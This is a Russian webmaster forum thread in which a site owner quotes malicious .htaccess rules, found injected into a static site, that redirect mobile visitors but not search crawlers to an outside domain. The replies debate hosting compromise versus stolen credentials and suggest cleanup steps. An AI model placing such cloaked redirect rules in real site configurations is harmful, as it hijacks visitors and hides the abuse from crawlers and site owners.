В .htaccess вставили чужой код

12
selz
На сайте с 26.04.2011
Offline
62
4273

Сайт визитка на 12 страниц. Страницы HTML статические. базы данных нет, CMS нет.

7 дней назад сайт забанил Касперский.

Сайт скачали, проверили антивирусом - все чисто.

Написали в службу поддержки Касперского. На следующий день сайт разбанили.

Через сутки опять бан сайт поймал. Написали опять. Пришло письмо от Касперского, что сайт перенаправляет мобильных пользователей.

Проверили .htaccess

Там такой код


<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://stat.nice-dns.ru/?23&source=наш-домен.ru [L,R=302] # On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

Код удалили.

Если по FTP или панель, то и другие сайты бы изменили. А на них чисто.

Вопрос в том, как они .htaccess могли изменить?

Lupus
На сайте с 02.11.2002
Offline
241
#1
selz:
Если по FTP или панель, то и другие сайты бы изменили.

Вы бы изменили. Те, кто поумнее - не стали.

There are two types of people in this world: 1. Those who can extrapolate from incomplete data.
CTACEBu4
На сайте с 22.11.2005
Offline
119
#2

Вероятно взломан сервер хостера. Такое регулярно случается.

Причем, по своему опыту, размещения подобного кода в .htaccess чаще всего именно через взлом сервера хостинга.

Правда техподдержка у многих в этом не признается

Конвертирую трафик CPA, доход 15000 руб. в сутки (http://goo.gl/fRqIh), CPM=166.65 руб. Покупаю качественные сайты (/ru/forum/734320) (порталы, контент-проекты, сервисы, форумы).
GeorgeWhite
На сайте с 27.05.2008
Offline
131
#3
Lupus:
Те, кто поумнее
selz:
Если по FTP или панель, то и другие сайты бы изменили. А на них чисто.

Посещалка у затронутого сайта намного выше, чем у остальных? Или, может, именно мобильный трафик велик?

Lupus
На сайте с 02.11.2002
Offline
241
#4
CTACEBu4:
Вероятно взломан сервер хостера. Такое регулярно случается.

На три порядка реже заражения юзерских дектопов с их логинами-паролями.

selz
На сайте с 26.04.2011
Offline
62
#5
Правда техподдержка у многих в этом не признается

Да, не признаются. Говорят скрипты проверяйте, а их нет в папке )))

Посещалка у затронутого сайта намного выше, чем у остальных? Или, может, именно мобильный трафик велик?

Там трафик копейки 20-30 уников в сутки, региональный сайт. Запросов мало в поиске. Но сайт собирает те что есть.

Самый прикол, что после редиректа пользователь приземляется в поиск google.ru

Может конкуренты вставили?

CTACEBu4
На сайте с 22.11.2005
Offline
119
#6
Lupus:
На три порядка реже заражения юзерских дектопов с их логинами-паролями.

Да, реже. Но все-таки бывает.

У меня, из последнего, был такой случай у hts.ru. Хотя стабильный хостинг, мне нравится, но бывает и такое. По крайней мере - респект им за то, что признались.

Причем, случай был такой же как у ТС, с правкой .htaccess на нескольких сайтах.

Заметили через долгое время, только после алерта в Я.Вебмастере о вредноносном коде.

Lupus
На сайте с 02.11.2002
Offline
241
#7
CTACEBu4:
Да, реже. Но все-таки бывает.

Бывают и пожары в датацентрах, но мы же не объясняем любой downtime пожаром. О вашем сценарии есть смысл говорить, когда однозначно доказано, что системы клиентов, управляющих аккаунтом не скомпроментированы. А судя по рассуждениям ТС, он не очень силен в безопасности.

F
На сайте с 01.03.2012
Offline
15
fab
#8

Какая cms?

скачать все файлы, искать там чтото типа eval(base64_decode(<левый дамп>

ICQ 1088шесть7991
Lupus
На сайте с 02.11.2002
Offline
241
#9
fab:
Какая cms?
selz:
Страницы HTML статические.

Читаем - пишем...

F
На сайте с 01.03.2012
Offline
15
fab
#10

Я бы проверил права на папки хостинга

заменил бы все файлы хостинга на файлы с архива, если есть возможность

или нашел бы вредоносный код путем сравнения файлов архива с файлами сайта, например прогой Beyond Compare

ну и отключил бы исполнение php в html файлах

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий